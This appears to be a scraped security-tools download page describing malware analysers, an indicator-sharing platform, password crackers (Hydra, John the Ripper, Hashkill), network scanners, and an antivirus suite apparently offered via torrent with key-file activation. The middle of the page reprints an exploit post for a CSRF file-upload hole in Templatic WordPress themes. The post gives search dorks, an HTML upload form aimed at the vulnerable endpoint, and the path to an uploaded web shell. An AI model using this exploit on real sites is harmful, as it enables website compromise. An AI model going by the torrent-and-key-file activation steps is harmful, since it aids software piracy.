Description

This program is a scanner that helps detect and delete virus such as "MyDoom, Sasser, etc", created with custom engine developed by VirAtt Viruslab this program fastly detect, delete, and destroy process file of the virus itself including fixing registry error caused by the virus.

Features

• Destroy Worm Process (Mydoom, Sasser, etc.)
• Super small process and file
• Delete virus and worm file in system directory
• Fix Registry errors caused by the virus
• Unhide windows function (Task Manager, MSConfig, etc)

[Download]

The problem that we experienced in the past was the difficulty to exchange information about (targeted) malwares and attacks within a group of trusted partners, or a bilateral agreement. Even today much of the information exchange happens in unstructured reports where you have to copy-paste the information in your own text-files that you then have to parse to export to (N)IDS and systems like log-searches, etc…

A huge challenge in the Cyber Security domain is the information sharing inside and between organizations. This platform has as goal to facilitate:

• central IOC database: storing technical and non-technical information about malwares and attacks, … Data from external instances is also imported into your local instance
• correlation: automatically creating relations between malwares, events and attributes
• storing data in a structured format (allowing automated use of the database for various purposes)
• export: generating IDS, OpenIOC, plain text, xml output to integrate with other systems (network IDS, host IDS, custom tools, …)
• import: batch-import, import from OpenIOC, GFI sandbox, ThreatConnect CSV, …
• data-sharing: automatically exchange and synchronization with other parties and trust-groups

Exchanging info results in faster detection of targeted attacks and improves the detection ratio while reducing the false positives. We also avoid reversing similar malware as we know very fast that others already worked on this malware.

[Download]

Adobe Malware Classifier is a command-line tool that lets antivirus analysts, IT administrators, and security researchers quickly and easily determine if a binary file contains malware, so they can develop malware detection signatures faster, reducing the time in which users' systems are vulnerable.

Malware Classifier uses machine learning algorithms to classify Win32 binaries – EXEs and DLLs – into three classes: 0 for “clean,” 1 for “malicious,” or “UNKNOWN.”

The tool was developed using models resultant from running the J48, J48 Graft, PART, and Ridor machine-learning algorithms on a dataset of approximately 100,000 malicious programs and 16,000 clean programs. 

The tool extracts seven key features from an unknown binary, feeds them to one of the four classifiers or all of them, and presents its classification of the unknown binary.

[Download]

As the first company Avira Antivirus German, now able to market to a very good antivirus. Avira Internet Security antivirus offered by this company is one of the most powerful yet high-performance and show data, it can be considered one of the strongest available security package into account. The software of your computer against viruses, worms, Internet 's, Trojans, ad and spyware you, robots (Bots) and protects them from dangerous spyware. The important features of Avira Internet Security software uses very few system resources, settings and user interface is very simple scanner tool to prepare profiles, search for detection of malware, safety Mail POP3 and SMTP against viruses and malware powerful servers to download updates faster, at intervals specified by the user to update, complete security against phishing, rootkits and phishing attacks and security systems that are fully integrated.

A key feature of the software Avira Internet Security:
- Brabranva effective protection from viruses, Trojans, worms and other threats 
- effectively detect and remove rootkits 
- High scanning speed 
- new interface design graphics software 
- protect the system against attacks known as phishing 
- protection against all types of malware and spyware 
- Special protection against viruses for emails (POP 3) 
- Quickly update feature through Server Premium 
- emergency rescue system disc 
- saver for web browsing and Download Safe 
- Powerful embedded firewall software 
- anti-spam and passive AntiPhishing 
- performance to match data Abbey 
- being friendly 
- and ...

- Min. 150 MB available disk space 
- Min. 512 MB ??RAM (Windows XP) 
- Min. 1024th MB RAM (Windows Vista, Windows 7) 
- For all installations: Windows Internet Explorer 6.0 or higher 
- Administrator rights are required for the installation

1.Run setup file & install it.
2.Select offline activation & activate using key file

[Torrent Link]

Malheur is a tool for the automatic analysis of malware behavior (program behavior recorded from malicious software in a sandbox environment). It has been designed to support the regular analysis of malicious software and the development of detection and defense measures. Malheur allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes.

Analysis of malware behavior?

Malheur builds on the concept of dynamic analysis: Malware binaries are collected in the wild and executed in a sandbox, where their behavior is monitored during run-time. The execution of each malware binary results in a report of recorded behavior. Malheur analyzes these reports for discovery and discrimination of malware classes using machine learning.

Malheur can be applied to recorded behavior of various format, as long as monitored events are separated by delimiter symbols, for example as in reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox and Joebox.

[Download]

Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic. This comes handy when analyzing how certain malware species try to communicate with the outside world.

Malcom can help you:

• detect central command and control (C&C) servers
• understand peer-to-peer networks
• observe DNS fast-flux infrastructures
• quickly determine if a network artifact is 'known-bad'

The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network. Convert network traffic information to actionable intelligence faster.
Check the wiki for a Quickstart and some nice screenshots.
In the near future, it will also become a collaborative tool (coming soon!)

[Download]

Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won't damage production systems, it's completely safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Major Features:

1. Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, CSS, and development frameworks (e.g. ASP.NET, JavaServer)
2. Works seamlessly with complex Web 2.0 applications while you drive the Web browser
3. Non-intrusive, will not raise alarms or damage production sites
4. Real-time analysis and reporting - findings are reported as they’re found, exportable to XML, HTML, and Team Foundation Server (TFS)
5. Configurable domains with wildcard support
6. Extensible framework for adding new checks

Watcher is built as a plugin for the Fiddler HTTP debugging proxy available at www.fiddlertool.com. Fiddler provides all of the rich functionality of a good Web/HTTP proxy. With Fiddler you can capture all HTTP traffic, intercept and modify, replay requests, and much much more. Fiddler provides the HTTP proxy framework for Watcher to work in, allowing for seamless integration with today’s complex Web 2.0 or Rich Internet Applications. Watcher runs silently in the background while you drive your browser and interact with the Web-application.

Watcher is built in C# as a small framework with 30+ checks already included. It's built so that new checks can be easily created to perform custom audits specific to your organizational policies, or to perform more general-purpose security assessments. Examples of the types of issues Watcher will currently identify:

• ASP.NET VIEWSTATE insecure configurations
• JavaServer MyFaces ViewState without cryptographic protections
• Cross-domain stylesheet and javascript references
• User-controllable cross-domain references
• User-controllable attribute values such as href, form action, etc.
• User-controllable javascript events (e.g. onclick)
• Cross-domain form POSTs
• Insecure cookies which don't set the HTTPOnly or secure flags
• Open redirects which can be abused by spammers and phishers
• Insecure Flash object parameters useful for cross-site scripting
• Insecure Flash crossdomain.xml
• Insecure Silverlight clientaccesspolicy.xml
• Charset declarations which could introduce vulnerability (non-UTF-8)
• User-controllable charset declarations
• Dangerous context-switching between HTTP and HTTPS
• Insufficient use of cache-control headers when private data is concerned (e.g. no-store)
• Potential HTTP referer leaks of sensitive user-information
• Potential information leaks in URL parameters
• Source code comments worth a closer look
• Insecure authentication protocols like Digest and Basic
• SSL certificate validation errors
• SSL insecure protocol issues (allowing SSL v2)
• Unicode issues with invalid byte streams
• Sharepoint insecurity checks
• more….

[Download]

Hydra is a parallelized network logon cracker which supports numerous protocols to attack, new modules are easy to add, beside that, it is flexible and very fast.

Features

• IPv6 Support
• Graphic User Interface
• Internationalized support (RFC 4013)
• HTTP proxy support
• SOCKS proxy support

The tool supports the following protocols:

Samba, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more.

[Download]

PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers.

NOTE: The toolkit itself is not able to crack passwords, but instead designed to make operation of password crackers more efficient.

[Download]

#Title : Wordpress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]

#Author : Jje Incovers

#Date : 31/03/2014

#Category : Web Applications

#Type : PHP

#Vendor : http://templatic.com/

#Download : http://templatic.com/wordpress-themes-store/

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : CSRF

 

#Dork :

inurl:/wp-content/themes/Realestate/

inurl:/wp-content/themes/dailydeal/

inurl:/wp-content/themes/nightlife/

inurl:/wp-content/themes/5star/

inurl:/wp-content/themes/specialist/

 

CSRF File Upload Vulnerability

 

Exploit & POC : http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php

 

<html>

<body>

<center>

<form method="post" enctype="multipart/form-data" action="http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php

">

 

<br>

</br>

<input name="uploadfile[]" type="file" />

 

<br>

<input type="submit" value="upload" />

</form>

</center>

</body>

</html>

 

File Access :

http://site-target/wp-content/themes/Realestate/images/tmp/your_shell.php

 

Note :

Script CSRF equate with dork you use

 

########################################

#Greetz : SANJUNGAN JIWA , All Indonesian H4xor

#Thanks : All member SANJUNGAN JIWA , Co-p1r3 , Jje Incovers , MrTieDie , Ice-Cream ,

########################################

 

# 90952935D5011A31   1337day.com [2014-04-03]   69BF4D7EF87E2E8E #




http://1337day.com/exploit/22091

Hashkill is an opensource hash cracker for Linux that uses OpenSSL. Currently it supports 4 attack methods (dictionary, bruteforce, hybrid).

Hashkill has 35 plugins for different types of passwords (ranging from simple hashes like MD5 and SHA1 to passworded ZIP files and private SSL key passphrases).

Multi-hash support (you may load hashlists of length up to 1 million) and very fast GPU support on Nvidia (compute capability 2.1 cards also supported) and ATI (4xxx, 5xxx and 6xxx).

The latest update includes 9 new plugins: bfunix, drupal7, django256, sha256unix, mssql-2012, o5logon, msoffice-old, msoffice, luks. Of them msoffice-old is currently supported on CPU only, the rest are GPU-accelerated. Improved bitmaps handling in non-salted kernels addded, so that huge hashlists would be cracked at faster speeds. Now Thermal monitoring can now be disabled using -T 0 command-line argument.

[Download]

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.

John the Ripper is free and Open Source software, distributed primarily in source code form. If you would rather use a commercial product tailored for your specific operating system, please consider John the Ripper Pro, which is distributed primarily in the form of "native" packages for the target operating systems and in general is meant to be easier to install and use while delivering optimal performance.

Changelog v1.8.0

• Revised the incremental mode to let the current character counts grow for each character position independently, with the aim to improve efficiency in terms of successful guesses per candidate passwords tested.
• Revised the pre-defined incremental modes, as well as external mode filters that are used to generate .chr files.
• Added makechr, a script to (re-)generate .chr files.
• Enhanced the status reporting to include four distinct speed metrics (g/s, p/s, c/s, and C/s).
• Added the “–fork=N” and “–node=MIN[-MAX]/TOTAL” options for trivial parallel and distributed processing.
• In the external mode compiler, treat character literals as unsigned.
• Renamed many of the formats.
• Updated the documentation.
• Relaxed the license for many source files to cut-down BSD.
• Relaxed the license for John the Ripper as a whole from GPLv2 (exact version) to GPLv2 or newer with optional OpenSSL and unRAR exceptions.
• Assorted other changes have been made.

[Download]

This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares. It is based on the functionality of the standard Windows tool nbtstat, but it operates on a range of addresses instead of just one. I wrote this tool because the existing tools either didn't do what I wanted or ran only on the Windows platforms: mine runs on just about everything.

[Download] 

NetBScanner is a network scanner tool that scans all computers in the IP addresses range you choose, using NetBIOS protocol. For every computer located by this NetBIOS scanner, the following information is displayed: IP Address, Computer Name, Workgroup or Domain, MAC Address, and the company that manufactured the network adapter (determined according to the MAC address). NetBScanner also shows whether a computer is a Master Browser. You can easily select one or more computers found by NetBScanner, and then export the list into csv/tab-delimited/xml/html file.

[Download]

MAC Address Scanner is the free desktop tool to remotely scan and find MAC Address of all systems on your local network.

It allows you to scan either a single host or range of hosts at a time. During the scan, it displays the current status for each host. After the completion, you can generate detailed scan report in HTML/XML/TEXT/CSV format.

Note that you can find MAC address for all systems within your subnet only. For all others, you will see the MAC address of the Gateway or Router.

On certain secure WiFi configurations with MAC filtering enabled, this tool can help Pentesters to find out active MAC addresses and then use them to connect to such wireless network.

Being GUI based tool makes it very easy to use for all level of users including beginners.

It is fully portable and works on all platforms starting from Windows XP to Windows 8.

[Download]